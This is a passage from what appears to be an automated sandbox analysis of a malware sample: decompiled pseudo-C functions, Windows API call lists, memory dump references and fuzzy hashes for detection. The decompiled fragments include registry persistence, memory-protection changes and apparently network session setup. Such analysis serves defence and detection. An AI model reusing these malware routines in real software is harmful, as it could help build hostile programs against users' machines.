						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E00DD77EC(_t34);
					}
					E00DD77EC(_t31);
				}
				return _v8;
			}













                                                            0x00dd3b3a
                                                            0x00dd3b3f
                                                            0x00dd3b44
                                                            0x00dd3b4b
                                                            0x00dd3b57
                                                            0x00dd3b5b
                                                            0x00dd3b5d
                                                            0x00dd3b63
                                                            0x00dd3b6f
                                                            0x00dd3b73
                                                            0x00dd3b86
                                                            0x00dd3b8e
                                                            0x00dd3ba2
                                                            0x00dd3baa
                                                            0x00dd3bac
                                                            0x00dd3bac
                                                            0x00dd3bb3
                                                            0x00dd3bb3
                                                            0x00dd3bba
                                                            0x00dd3bba
                                                            0x00dd3bc0
                                                            0x00dd3bc5
                                                            0x00dd3bcb

                                                            APIs
                                                              • Part of subcall function 00DD1440: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00DD3B57,004F0053,00000000,?), ref: 00DD1449
                                                              • Part of subcall function 00DD1440: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00DD3B57,004F0053,00000000,?), ref: 00DD1473
                                                              • Part of subcall function 00DD1440: memset.NTDLL ref: 00DD1487
                                                            • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00DD3B86
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00DD3BA2
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00DD3BB3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 830012212-0
                                                            • Opcode ID: 4acc60b3f5a98cef331f2a002a4165a4521190028eaa99de1db989ceaf4c385a
                                                            • Instruction ID: 758230bd0790260809019b087fce3485d61f8dce4457392ccf66d4e75bf2077e
                                                            • Opcode Fuzzy Hash: 4acc60b3f5a98cef331f2a002a4165a4521190028eaa99de1db989ceaf4c385a
                                                            • Instruction Fuzzy Hash: C7113976500209BBDB11DBE8CC85FAF77BCEB04304F15449BA201E7252EB70AA089B71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04570CCF, Relevance: 4.5, APIs: 3, Instructions: 49memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000402,?,?,?,?,0457A836,0458B7A4,?,?,00000402,0457C495,04588570,00000018,0456A0D1,?,00000402), ref: 04570D01
                                                            • VirtualProtect.KERNELBASE(00000402,00000004,00000040,00000000,0458B7A4,?,?,?,?,0457A836,0458B7A4,?,?,00000402,0457C495,04588570), ref: 04570D1B
                                                            • VirtualProtect.KERNELBASE(00000402,00000004,00000000,00000000,?,?,?,0457A836,0458B7A4,?,?,00000402,0457C495,04588570,00000018,0456A0D1), ref: 04570D4E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ProtectVirtual$lstrlen
                                                            • String ID:
                                                            • API String ID: 386137988-0
                                                            • Opcode ID: b95f326f79f8749ba57332ac1ac43f3b4b382f05acbc21f1b52a30acf5d0afc8
                                                            • Instruction ID: b420d5ffd5d08b93ae2805c51234b0bb2b06a90ac66e400f75820ba2f7c00680
                                                            • Opcode Fuzzy Hash: b95f326f79f8749ba57332ac1ac43f3b4b382f05acbc21f1b52a30acf5d0afc8
                                                            • Instruction Fuzzy Hash: 17111C75900308FFEB11CF45E485F9EBBB8FF04B55F108059ED059A251D7B8EA44ABA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04581736, Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCreateKeyA.ADVAPI32(80000001,049BA7F0,?), ref: 0458174B
                                                            • RegOpenKeyA.ADVAPI32(80000001,049BA7F0,?), ref: 04581755
                                                            • lstrlen.KERNEL32(049BA7F0,00000000,00000000,00000000,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?,04575AB0), ref: 04581774
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateOpenlstrlen
                                                            • String ID:
                                                            • API String ID: 2865187142-0
                                                            • Opcode ID: 4d63cb87455ee4b9a267deb331fbe0fae9607c7cfe28c0276b9ff226e4e8dcd1
                                                            • Instruction ID: e078c83e1a546caae7b3fe19e05622087a77c2a1a1a7a72db2568ed857b339a0
                                                            • Opcode Fuzzy Hash: 4d63cb87455ee4b9a267deb331fbe0fae9607c7cfe28c0276b9ff226e4e8dcd1
                                                            • Instruction Fuzzy Hash: 6DF09676100208BFEB11AF90EC84FEA7B7CFB85365F10401DFE46E5240EA74AA45D7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04583A70, Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEvent.KERNEL32(000003BC,0456D1D5), ref: 04583A7A
                                                              • Part of subcall function 04566975: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,04583A85), ref: 0456699E
                                                              • Part of subcall function 04566975: RtlDeleteCriticalSection.NTDLL(0458C2E0), ref: 045669D1
                                                              • Part of subcall function 04566975: RtlDeleteCriticalSection.NTDLL(0458C300), ref: 045669D8
                                                              • Part of subcall function 04566975: CloseHandle.KERNEL32(?,?,04583A85), ref: 04566A07
                                                              • Part of subcall function 04566975: ReleaseMutex.KERNEL32(0000045C,00000000,?,?,?,04583A85), ref: 04566A18
                                                              • Part of subcall function 04566975: CloseHandle.KERNEL32(?,?,04583A85), ref: 04566A24
                                                              • Part of subcall function 04566975: ResetEvent.KERNEL32(00000000,00000000,?,?,?,04583A85), ref: 04566A30
                                                              • Part of subcall function 04566975: CloseHandle.KERNEL32(?,?,04583A85), ref: 04566A3C
                                                              • Part of subcall function 04566975: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,04583A85), ref: 04566A42
                                                              • Part of subcall function 04566975: SleepEx.KERNEL32(00000064,00000001,?,?,04583A85), ref: 04566A56
                                                              • Part of subcall function 04566975: HeapFree.KERNEL32(00000000,00000000,?,?,04583A85), ref: 04566A79
                                                              • Part of subcall function 04566975: RtlRemoveVectoredExceptionHandler.NTDLL(01348118), ref: 04566AB2
                                                            • CloseHandle.KERNEL32(000003BC), ref: 04583A8F
                                                            • HeapDestroy.KERNELBASE(045C0000), ref: 04583A9F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseHandle$Sleep$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                                                            • String ID:
                                                            • API String ID: 1636361345-0
                                                            • Opcode ID: 708a53c89ac8b5c74f2c3119d124cd08a64fd16c93d24ae47cced0415b5670ec
                                                            • Instruction ID: 9f2307f2d0d786ad8a1da2776b56abe827bbf9144b51af0ef1c06e8277a1e019
                                                            • Opcode Fuzzy Hash: 708a53c89ac8b5c74f2c3119d124cd08a64fd16c93d24ae47cced0415b5670ec
                                                            • Instruction Fuzzy Hash: 0FE04270700202DBAB10AF75F88CA1637ACFA05A41344641CB951F7144EE2AE808BA29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD642D, Relevance: 3.8, APIs: 3, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD642D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E00DD77D7(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0xdda324, 0x110);
					_t27 =  *0xdda328; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E00DD1C69(0x110, _a4, _a4, _t27, 0);
					}
					if(E00DD60EB( &_v36) != 0) {
						_t35 = E00DD3FAB(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E00DD3612(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875fc
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E00DD77EC(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E00DD77EC(_a4);
				}
				return _v16;
			}
















                                                            0x00dd6433
                                                            0x00dd6438
                                                            0x00dd6445
                                                            0x00dd6448
                                                            0x00dd644b
                                                            0x00dd6452
                                                            0x00dd6455
                                                            0x00dd6463
                                                            0x00dd6468
                                                            0x00dd646d
                                                            0x00dd6472
                                                            0x00dd6474
                                                            0x00dd647d
                                                            0x00dd647d
                                                            0x00dd648c
                                                            0x00dd64a1
                                                            0x00dd64a8
                                                            0x00dd64af
                                                            0x00dd64b5
                                                            0x00dd64bb
                                                            0x00dd64c3
                                                            0x00dd64c9
                                                            0x00dd64cc
                                                            0x00dd64d9
                                                            0x00dd64de
                                                            0x00dd64e2
                                                            0x00dd64e2
                                                            0x00dd64a8
                                                            0x00dd64ed
                                                            0x00dd64f8
                                                            0x00dd64f8
                                                            0x00dd6504

                                                            APIs
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • memcpy.NTDLL(00000000,00000110,00DD6E08,00DD6E08,?,?,00DD6E08,?,?,00DD308E,?), ref: 00DD6463
                                                            • memset.NTDLL ref: 00DD64D9
                                                            • memset.NTDLL ref: 00DD64ED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: memset$AllocateHeapmemcpy
                                                            • String ID:
                                                            • API String ID: 1529149438-0
                                                            • Opcode ID: 43824ec4a10285dfa387d58cc3b715281eb35e824ab21a388e42f99f095f7950
                                                            • Instruction ID: 6851a74691ad6c1c0811a0956972aba7f50350fc9ff399bf83c1d9536ad19d5e
                                                            • Opcode Fuzzy Hash: 43824ec4a10285dfa387d58cc3b715281eb35e824ab21a388e42f99f095f7950
                                                            • Instruction Fuzzy Hash: B921EB75A00218BBDB11AFA5CC41FAEBBB8EF48750F048066F904E6352E734DA05CBB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD740B, Relevance: 3.1, APIs: 2, Instructions: 147serviceCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 38%
                                                            			E00DD740B(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0xdda2d4; // 0x2bed5a8
				_t4 = _t49 + 0xddb448; // 0x39c89f0
				_t5 = _t49 + 0xddb438; // 0x9ba05972
				_t51 =  *0xdda140(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0xdda2d4; // 0x2bed5a8
						_t30 = _t56 + 0xddb428; // 0x39c89d0
						_t31 = _t56 + 0xddb458; // 0x4c96be40
						_t58 =  *0xdda114(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0xdda2d4; // 0x2bed5a8
											_t23 = _t76 + 0xddb428; // 0x39c89d0
											_t24 = _t76 + 0xddb458; // 0x4c96be40
											_t105 =  *0xdda114(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0xdda2d4; // 0x2bed5a8
													_t67 = _v28;
													_t40 = _t99 + 0xddb418; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

































                                                            0x00dd7416
                                                            0x00dd7418
                                                            0x00dd741f
                                                            0x00dd7420
                                                            0x00dd7421
                                                            0x00dd7422
                                                            0x00dd7428
                                                            0x00dd742d
                                                            0x00dd7437
                                                            0x00dd743e
                                                            0x00dd7444
                                                            0x00dd7448
                                                            0x00dd744e
                                                            0x00dd7456
                                                            0x00dd7457
                                                            0x00dd745c
                                                            0x00dd745d
                                                            0x00dd745f
                                                            0x00dd7462
                                                            0x00dd7463
                                                            0x00dd7464
                                                            0x00dd746a
                                                            0x00dd74ff
                                                            0x00dd7504
                                                            0x00dd750b
                                                            0x00dd7515
                                                            0x00dd751b
                                                            0x00dd751d
                                                            0x00dd7523
                                                            0x00000000
                                                            0x00dd7470
                                                            0x00dd7470
                                                            0x00dd7477
                                                            0x00dd7480
                                                            0x00dd7484
                                                            0x00dd748a
                                                            0x00dd748d
                                                            0x00dd74f4
                                                            0x00000000
                                                            0x00dd748f
                                                            0x00dd748f
                                                            0x00dd7526
                                                            0x00dd7528
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd7495
                                                            0x00dd7495
                                                            0x00dd7495
                                                            0x00dd749c
                                                            0x00dd74a2
                                                            0x00dd74a7
                                                            0x00dd74af
                                                            0x00dd74b0
                                                            0x00dd74b1
                                                            0x00dd74b3
                                                            0x00dd74b7
                                                            0x00dd74bb
                                                            0x00000000
                                                            0x00dd74bd
                                                            0x00dd74c1
                                                            0x00dd74c6
                                                            0x00dd74cd
                                                            0x00dd74dd
                                                            0x00dd74df
                                                            0x00dd74e5
                                                            0x00dd74ea
                                                            0x00dd752a
                                                            0x00dd752a
                                                            0x00dd7537
                                                            0x00dd753b
                                                            0x00dd7540
                                                            0x00dd7546
                                                            0x00dd754b
                                                            0x00dd7555
                                                            0x00dd7557
                                                            0x00dd755d
                                                            0x00dd755d
                                                            0x00dd7560
                                                            0x00dd7566
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd74ea
                                                            0x00000000
                                                            0x00dd74ec
                                                            0x00dd74ec
                                                            0x00dd74ed
                                                            0x00000000
                                                            0x00dd74f2
                                                            0x00dd748f
                                                            0x00dd748d
                                                            0x00dd7484
                                                            0x00dd7569
                                                            0x00dd7569
                                                            0x00dd756f
                                                            0x00dd756f
                                                            0x00dd7578

                                                            APIs
                                                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,039C89D0,00DD19E4,?,?,?,?,?,?,?,?,?,?,?,00DD19E4), ref: 00DD74D7
                                                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,039C89D0,00DD19E4,?,?,?,?,?,?,?,00DD19E4,00000000,00000000,00000000,006D0063), ref: 00DD7515
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: QueryServiceUnknown_
                                                            • String ID:
                                                            • API String ID: 2042360610-0
                                                            • Opcode ID: dc42c00fae24b9eb6ca216c969d3e23d702a23c91a51b16bffbb7effc0078a22
                                                            • Instruction ID: bc6ff7c1ac231f9285a734a01668c46a9bbe0ee827f7d6cdd9eeada3bd5d116f
                                                            • Opcode Fuzzy Hash: dc42c00fae24b9eb6ca216c969d3e23d702a23c91a51b16bffbb7effc0078a22
                                                            • Instruction Fuzzy Hash: 71511075900219AFCB00DFE8C888DAEB7B9FF48714B05859AE905EB351E731AD45CBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD6F10, Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 21%
                                                            			E00DD6F10(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _t37;
				long _t39;
				long _t40;
				signed int _t41;
				intOrPtr _t42;
				signed int _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				void* _t65;
				intOrPtr* _t67;
				intOrPtr* _t68;
				void* _t71;

				_t68 = __esi;
				_t65 = E00DD5691(_t37, _a4);
				if(_t65 == 0) {
					L18:
					_t39 = GetLastError();
				} else {
					_t40 = GetVersion();
					_t71 = _t40 - 6;
					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
						_a4 = 4;
					} else {
						_a4 = 0;
					}
					__imp__(_t65, _a4, 0, 0, 0); // executed
					 *(_t68 + 0x10) = _t40;
					_t41 = E00DD77EC(_t65);
					if( *(_t68 + 0x10) == 0) {
						goto L18;
					} else {
						_t42 = E00DD5691(_t41,  *_t68);
						_v8 = _t42;
						if(_t42 == 0) {
							goto L18;
						} else {
							_t67 = __imp__; // 0x6f54f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t68 + 0x10), _v8, 0x50, 0);
								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
								_t43 = E00DD77EC(_v8);
								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x100;
									_t44 = E00DD5691(_t43,  *((intOrPtr*)(_t68 + 4)));
									_v8 = _t44;
									if(_t44 == 0) {
										goto L18;
									} else {
										_t45 =  *0xdda2d4; // 0x2bed5a8
										_t21 = _t45 + 0xddb76c; // 0x450047
										_t46 = _t21;
										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4);
										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
										E00DD77EC(_v8);
										_t48 =  *((intOrPtr*)(_t68 + 0x18));
										if(_t48 == 0) {
											goto L18;
										} else {
											_v12 = 4;
											__imp__(_t48, 0x1f,  &_a4,  &_v12);
											if(_t48 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
											}
											_push(4);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t68 + 0x18)));
											if( *_t67() == 0) {
												goto L18;
											} else {
												_push(4);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t68 + 0x18)));
												if( *_t67() == 0) {
													goto L18;
												} else {
													_t39 = 0;
												}
											}
										}
									}
								}
							} else {
								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
								if(_t42 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t39;
			}



















                                                            0x00dd6f10
                                                            0x00dd6f1f
                                                            0x00dd6f25
                                                            0x00dd705b
                                                            0x00dd705b
                                                            0x00dd6f2b
                                                            0x00dd6f2b
                                                            0x00dd6f31
                                                            0x00dd6f33
                                                            0x00dd6f41
                                                            0x00dd6f3c
                                                            0x00dd6f3c
                                                            0x00dd6f3c
                                                            0x00dd6f4f
                                                            0x00dd6f56
                                                            0x00dd6f59
                                                            0x00dd6f61
                                                            0x00000000
                                                            0x00dd6f67
                                                            0x00dd6f69
                                                            0x00dd6f70
                                                            0x00dd6f73
                                                            0x00000000
                                                            0x00dd6f79
                                                            0x00dd6f7c
                                                            0x00dd6f82
                                                            0x00dd6f99
                                                            0x00dd6fa2
                                                            0x00dd6fab
                                                            0x00dd6fae
                                                            0x00dd6fb6
                                                            0x00000000
                                                            0x00dd6fbc
                                                            0x00dd6fc4
                                                            0x00dd6fc7
                                                            0x00dd6fd0
                                                            0x00dd6fd3
                                                            0x00000000
                                                            0x00dd6fd9
                                                            0x00dd6fdc
                                                            0x00dd6fe7
                                                            0x00dd6fe7
                                                            0x00dd6ff1
                                                            0x00dd6ffa
                                                            0x00dd6ffd
                                                            0x00dd7002
                                                            0x00dd7007
                                                            0x00000000
                                                            0x00dd7009
                                                            0x00dd7014
                                                            0x00dd701b
                                                            0x00dd7023
                                                            0x00dd7025
                                                            0x00dd7033
                                                            0x00dd7033
                                                            0x00dd7035
                                                            0x00dd703a
                                                            0x00dd703b
                                                            0x00dd703d
                                                            0x00dd7044
                                                            0x00000000
                                                            0x00dd7046
                                                            0x00dd7046
                                                            0x00dd704b
                                                            0x00dd704c
                                                            0x00dd704e
                                                            0x00dd7055
                                                            0x00000000
                                                            0x00dd7057
                                                            0x00dd7057
                                                            0x00dd7057
                                                            0x00dd7055
                                                            0x00dd7044
                                                            0x00dd7007
                                                            0x00dd6fd3
                                                            0x00dd6f84
                                                            0x00dd6f8f
                                                            0x00dd6f93
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd6f93
                                                            0x00dd6f82
                                                            0x00dd6f73
                                                            0x00dd6f61
                                                            0x00dd7064

                                                            APIs
                                                              • Part of subcall function 00DD5691: lstrlen.KERNEL32(?,00000000,039C9D00,745EC740,00DD291A,039C9F05,00DD5FB9,00DD5FB9,?,00DD5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 00DD5698
                                                              • Part of subcall function 00DD5691: mbstowcs.NTDLL ref: 00DD56C1
                                                              • Part of subcall function 00DD5691: memset.NTDLL ref: 00DD56D3
                                                            • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00DD6A09,73BB81D0,00000000,039C9698,?,?,00DD3771,?,039C9698,0000EA60), ref: 00DD6F2B
                                                            • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00DD6A09,73BB81D0,00000000,039C9698,?,?,00DD3771,?,039C9698,0000EA60), ref: 00DD705B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                            • String ID:
                                                            • API String ID: 4097109750-0
                                                            • Opcode ID: 9259c47e2e4245ca70d34f01a3fc37c3abf10607b3d0da8e1f8a34ae3a1bbc9d
                                                            • Instruction ID: 456f048695fd29fe422e9b1d5160654c4d5100311892c5534c9a6cb1e395e880
                                                            • Opcode Fuzzy Hash: 9259c47e2e4245ca70d34f01a3fc37c3abf10607b3d0da8e1f8a34ae3a1bbc9d
                                                            • Instruction Fuzzy Hash: 04413B71500309BFEB20AFA0DC85EBA7BB9EB04740F14456BB645962A1E771EA44DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD18B7, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 75%
                                                            			E00DD18B7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00DD56E3(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xdda2d4; // 0x2bed5a8
						_t20 = _t68 + 0xddb1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00DD609E(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                            0x00dd18bd
                                                            0x00dd18c0
                                                            0x00dd18d0
                                                            0x00dd18d9
                                                            0x00dd18dd
                                                            0x00dd19ab
                                                            0x00dd19b1
                                                            0x00dd19b1
                                                            0x00dd18f7
                                                            0x00dd18fc
                                                            0x00dd1900
                                                            0x00dd1906
                                                            0x00dd190b
                                                            0x00dd1912
                                                            0x00dd1921
                                                            0x00dd1921
                                                            0x00dd1925
                                                            0x00dd1927
                                                            0x00dd1933
                                                            0x00dd193e
                                                            0x00dd1949
                                                            0x00dd194d
                                                            0x00dd1957
                                                            0x00dd195b
                                                            0x00dd195d
                                                            0x00dd1962
                                                            0x00dd1969
                                                            0x00dd1979
                                                            0x00dd1979
